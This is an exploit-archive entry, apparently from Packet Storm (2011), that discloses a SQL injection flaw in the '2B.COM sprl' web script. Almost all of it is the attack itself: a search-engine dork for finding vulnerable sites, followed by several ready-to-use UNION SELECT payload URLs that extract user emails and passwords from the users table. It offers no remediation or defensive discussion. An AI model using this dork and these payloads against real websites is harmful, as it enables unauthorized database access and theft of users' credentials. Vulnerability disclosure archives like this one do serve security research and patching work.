2B.COM sprl SQL Injection

2011-12-11T00:00:00
ID PACKETSTORM:107772
Type packetstorm
Reporter Metropolis
Modified 2011-12-11T00:00:00

Description

                                        
                                            `2B.COM sprl <= SQL Injection Vulnerability  
========================================================  
  
####################################################################  
.:. Author : Metropolis  
.:. Home : http://metropolis.fr.cr  
.:. Script : 2B.COM sprl   
.:. Version : N/A  
.:. Dork : inurl:/php/index.php?doc_id=  
.:. Bug Type : Sql Injection  
  
####################################################################  
  
===[ Exploit ]===  
  
www.site.com/php/index.php?doc_id=[ SQL INJECTION ]  
  
www.site.com/php/index.php?doc_id=389+AND+1=2+UNION+SELECT+1,cOnCaT(usr_email,0x3a,usr_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users--  
  
  
/php/index.php?doc_id=389+AND+1=2+UNION+SELECT+1,cOnCaT(usr_email,0x3a,usr_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--  
  
or   
  
/php/index.php?doc_id=389+AND+1=2+UNION+SELECT+1,cOnCaT(usr_email,0x3a,usr_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users--  
  
  
####################################################################  
`